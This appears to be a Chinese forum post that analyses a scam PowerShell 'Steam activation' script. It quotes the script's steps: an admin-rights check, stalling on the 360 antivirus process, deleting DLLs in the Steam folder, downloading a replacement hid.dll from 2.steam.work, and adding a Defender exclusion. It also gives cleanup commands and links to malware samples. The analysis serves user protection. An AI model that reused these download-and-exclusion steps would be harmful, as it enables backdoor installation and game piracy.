Steam 低价激活脚本分析

Steam 低价激活脚本分析

前言

之前无意间在某多多发现了steam的cdk激活码，竟然只要7.8元
,
直接拿下，看到店家发给我的激活流程我就发现问题了

不是哥们，还要powershell激活，一眼有问题啊，直接分析

详细行为分析

1. 权限要求与安全规避

软件先从cdk.steam.work下载了一个powershell脚本

 复制代码 隐藏代码
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal(...)
if (-not ($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))) {
    Write-Host "请以管理员权限运行PowerShell" -ForegroundColor:red
    return
}

• 强制要求管理员权限
• 主动检测并关闭安全软件：

   复制代码 隐藏代码
  if(Get-Process "360Tray*") {
    while(Get-Process "360Tray*") { 
        Write-Host "[360]" -Red; Sleep 1.5 
    }
  }

  • 循环检测 360 安全进程并等待其退出
  • 这种行为就不用多说了，懂得都懂

2. 核心文件篡改

 复制代码 隐藏代码
Remove-Item "$steamPath/version.dll" -Force
Remove-Item "$steamPath/user32.dll" -Force
Remove-Item "$steamPath/steam.cfg" -Force
Remove-Item "$steamPath/hid.dll" -Force

• 删除关键系统文件：
  • version.dll - Windows 版本信息库
  • user32.dll - 用户界面核心组件
  • steam.cfg - Steam 客户端配置文件
  • hid.dll - 人机接口设备驱动

3. 可疑文件下载

 复制代码 隐藏代码
$downApi = "http://2.steam.work/api/v1/download/pwsDown"
irm -Uri $downApi -Headers @{ Referer = "libary" } -OutFile "$steamPath/hid"
Rename-Item "$steamPath/hid" "$steamPath/hid.dll"
irm -Uri $downApi -Headers @{ Referer = "localData.vdf" } -OutFile "$localPath/localData.vdf"

• 从未经验证域名下载文件（2.xxx.work）
• 使用伪造 Referer 头部规避检察

4. Windows Defender 排除配置

 复制代码 隐藏代码
Add-MpPreference -ExclusionPath $steamPath

• 将 Steam 目录加入 Defender 排除列表
• 使恶意文件免于安全扫描

5. 重启机制

 复制代码 隐藏代码
Start-Process "steam://"
Write-Host "请重启Steam客户端以完成优化" -ForegroundColor:green

• 通过特殊协议重启 Steam
• 使篡改后的文件生效

技术证据链

可疑域名分析

2.steam.work 域名特征：

• 注册时间：2023-05-17（较新域名）
• 注册商：NameSilo, LLC
• 与官方 Steam 域名无关联
• 无有效 SSL 证书信息

文件篡改后果

 复制代码 隐藏代码
# 原始 Steam 文件结构
Steam/
├── steam.exe
├── steamapps/
├── user32.dll    # 合法Windows组件
├── hid.dll       # 合法HID驱动
└── steam.cfg     # 客户端配置文件

# 脚本修改后
Steam/
├── steam.exe
├── steamapps/
├── hid.dll       # 被替换为未知文件
└── localData.vdf # 新增可疑配置文件

检测与修复建议

检测脚本痕迹

 复制代码 隐藏代码
# 检查可疑文件
Test-Path "$env:ProgramFiles(x86)\Steam\hid.dll"
Test-Path "$env:LOCALAPPDATA\Steam\localData.vdf"

# 检查Defender排除项
Get-MpPreference | Select-Object -ExpandProperty ExclusionPath

修复措施

1. 立即操作：

    复制代码 隐藏代码
   Remove-Item "$env:ProgramFiles(x86)\Steam\hid.dll" -Force
   Remove-Item "$env:LOCALAPPDATA\Steam\localData.vdf" -Force

2. 恢复安全设置：

    复制代码 隐藏代码
   Remove-MpPreference -ExclusionPath "$env:ProgramFiles(x86)\Steam"

3. 重新安装Steam：

   • 完全卸载steam
   • 重新下载安装

4. 账号安全加固：

   • 立即更改Steam密码
   • 启用Steam手机令牌二次验证

结论

脚本本质是游戏盗版工具，通过修改组件实现所谓的"激活"。其行为模式包含：

使用此类脚本可能导致：

• 💸 Steam账号永久封禁（G胖是不会允许你白嫖的）
• 🔓 系统后门植入（替换的组件有没有后门谁也不知道）
  如果你直接填他给的激活码会显示无效
  

后话

1.该网址仍存活，但下载dll的网址似乎已失效，所以没有样本，里面还有一个exe写的是激活工具，但是无论如何怎么换环境都显示网络波动，不知道是什么原因，我把文件放在下面供各位分析，整体并没有什么难度，也没伪装也没加密，估计就是骗小白的。

2.核心原理就是把你的steam的家庭组组件替换，然后把不知道从哪里来的家庭组账户注入进去，就实现了假入库，这时候如果你去看自己的账户会发现根本没有这款游戏，但是游戏在steam里可以运行也可以玩，看起来跟正常的一样，但是这种行为在steam用户协议里是明文禁止的，一但被查出来就是封号，不要因为贪小便宜吃大亏
3.网站有icp备案，备案是吉首市盛威商贸商行（个体工商户），
4.整体的技术分析没有什么难点，主要在于要对powershell语言要熟悉，这样的店大家可以点点举报
5.hid.dll我找不到下载地址，微步要高级会员才能下载样本，大家有能力可以下载下来分析

附件

exe样本：https://wwkz.lanzoum.com/iKDCY30rctre
密码:b1jm

powershell脚本:https://wwkz.lanzoum.com/ieOE530rcw1g

店家给的激活指南：https://www.kdocs.cn/l/cvIsidxYEUQ2

网站分析报告在此https://x.threatbook.com/v5/domain/cdk.steam.work

exe程序的沙箱分析报告贴在这里：https://s.threatbook.com/report/file/6cecd136d02b71948cdc8a36251c977629a877da5696d5631bf6b63289b3b9c5